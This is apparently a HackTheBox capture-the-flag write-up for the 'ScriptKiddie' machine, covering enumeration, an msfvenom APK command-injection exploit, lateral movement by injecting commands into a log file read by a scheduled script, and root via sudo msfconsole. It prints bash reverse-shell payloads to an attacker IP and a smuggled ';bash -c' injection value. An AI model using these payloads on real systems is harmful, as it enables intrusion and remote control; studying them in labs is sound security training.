HackTheBox — ScriptKiddie

As always, we start with nmap to discover open ports/services.

Nmap scan

nmap -sC -sV -oA scriptkiddie 10.10.10.234

We have two open ports 22/ssh , 5000/http. Lets enumerate http port.

HTTP Enumeration

Visiting 10.10.10.226:5000 we see that the web application uses three tools (Nmap, MSFVenom, Searchsploit).

The first thing i tried is injecting OS commands in each field but nothing worked. Next i did some googling for public exploits for these tools and found APK template command injection vulnerability in MSFVenom.

There’s a module in metasploit that exploits this vulnerability but lets use this python script from exploitdb instead.

Exploit: https://www.exploit-db.com/exploits/49491

Wee need to edit the payload variable in the script first.

payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"' 

Initial Foothold/User

Now lets run our netcat listener and run the exploit.

And we are on the box as kid user.

Lateral Movement

After some enumeration i found a script called scanlosers.sh inside pwn user home directory, we only have read permissions on it but i think the script is running regularly because the hackers file is cleared every few minutes. So lets understand the script to see how it works.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It reads the hackers file inside our home directory, and then it splits the string inside by a space and takes the third field (which is the IP address) and runs Nmap scan on it.

And we have read/write permissions on hackers file so we can edit the file to get OS command injection.

Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers

field1 & field2 are just for the cut command so we can inject our payload in the third field. And “;” to break out of the sh command and “#” to comment the rest of the command.

The final step is to run a netcat listener and receive the reverse shell nc -nvlp 1337 .

Getting root

Running sudo -l we can run metasploit’s msfconsole as root without password.

Metasploit’s msfconsole allows you to execute system commands within the msfconsole itself

sudo /opt/metasploit-framework-6-0-9/msfconsole

And we are ROOT !

If you find it useful, kindly give me a respect

Linkedin | Github

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.